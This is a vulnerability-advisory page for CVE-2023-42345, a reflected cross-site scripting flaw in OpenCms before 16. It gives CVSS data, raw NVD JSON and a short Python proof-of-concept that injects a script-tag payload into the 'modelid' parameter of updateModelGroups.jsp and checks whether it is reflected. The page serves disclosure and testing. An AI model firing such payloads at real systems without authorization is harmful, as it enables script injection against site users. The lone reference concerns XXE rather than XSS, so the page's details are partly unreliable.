Security Vulnerability Report
中文
CVE-2023-42345 CVSS 6.1 MEDIUM

CVE-2023-42345

Published: 2026-05-08 05:16:10
Last Modified: 2026-05-08 15:58:49

Description

A Cross Site Scripting vulnerability in Alkacon OpenCms before 16 exists via updateModelGroups.jsp.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Alkacon OpenCms < 16.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (replace with actual target) target_url = "http://localhost:8080/opencms/system/workplace/admin/accounts/updateModelGroups.jsp" # Malicious payload to test XSS # Attempting to inject a script tag that triggers an alert payload = { "modelid": "test"><script>alert('CVE-2023-42345-XSS')</script><" } try: # Send GET request with the malicious payload response = requests.get(target_url, params=payload) # Check if the payload is reflected in the response unescaped if "alert('CVE-2023-42345-XSS')" in response.text: print("[+] Vulnerability confirmed: XSS payload reflected in response.") else: print("[-] Vulnerability not detected or payload filtered.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-42345", "sourceIdentifier": "[email protected]", "published": "2026-05-08T05:16:09.703", "lastModified": "2026-05-08T15:58:49.383", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross Site Scripting vulnerability in Alkacon OpenCms before 16 exists via updateModelGroups.jsp."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/", "source": "[email protected]"}]}}